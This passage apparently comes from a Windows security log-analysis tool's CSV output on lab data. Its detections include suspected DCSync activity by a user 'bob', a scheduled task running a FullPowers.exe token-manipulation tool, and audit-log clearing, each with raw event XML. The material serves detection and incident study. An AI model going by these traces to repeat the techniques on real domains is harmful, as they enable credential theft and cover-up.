;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242590</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
</TimeCreated>
<EventRecordID>198242589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
</TimeCreated>
<EventRecordID>198242588</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-07T13:17:38.534995Z"">
</TimeCreated>
<EventRecordID>282588</EventRecordID>
<Correlation ActivityID=""1CC43E9D-F481-0001-373F-C41C81F4D501"">
</Correlation>
<Execution ProcessID=""620"" ThreadID=""672"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-19</Data>
<Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
<Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
<Data Name=""SubjectLogonId"">0x3e5</Data>
<Data Name=""TaskName"">\FullPowersTask</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.3&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;URI&gt;\FullPowersTask&lt;/URI&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers /&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;Author&quot;&gt;
&lt;UserId&gt;S-1-5-19&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;RequiredPrivileges&gt;
&lt;Privilege&gt;SeAssignPrimaryTokenPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeAuditPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeChangeNotifyPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeCreateGlobalPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeImpersonatePrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeIncreaseQuotaPrivilege&lt;/Privilege&gt;
&lt;Privilege&gt;SeIncreaseWorkingSetPrivilege&lt;/Privilege&gt;
&lt;/RequiredPrivileges&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;false&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;Duration&gt;PT10M&lt;/Duration&gt;
&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;false&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;false&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;Author&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;C:\Users\Public\Tools\TokenManip\FullPowers.exe&lt;/Command&gt;
&lt;Arguments&gt;-t 4932&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2022-05-01T04:40:18.084003Z"">
</TimeCreated>
<EventRecordID>21365</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1228"" ThreadID=""9912"">
</Execution>
<Channel>Security</Channel>
<Computer>wind10.winlab.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-482804190-775995292-3801157738-1002</SubjectUserSid>
<SubjectUserName>admin</SubjectUserName>
<SubjectDomainName>WIND10</SubjectDomainName>
<SubjectLogonId>0x47ea55</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",wind10.winlab.local,Security
Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:35:07.524202Z"">
</TimeCreated>
<EventRecordID>452811</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""812"" ThreadID=""3916"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x17dad</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
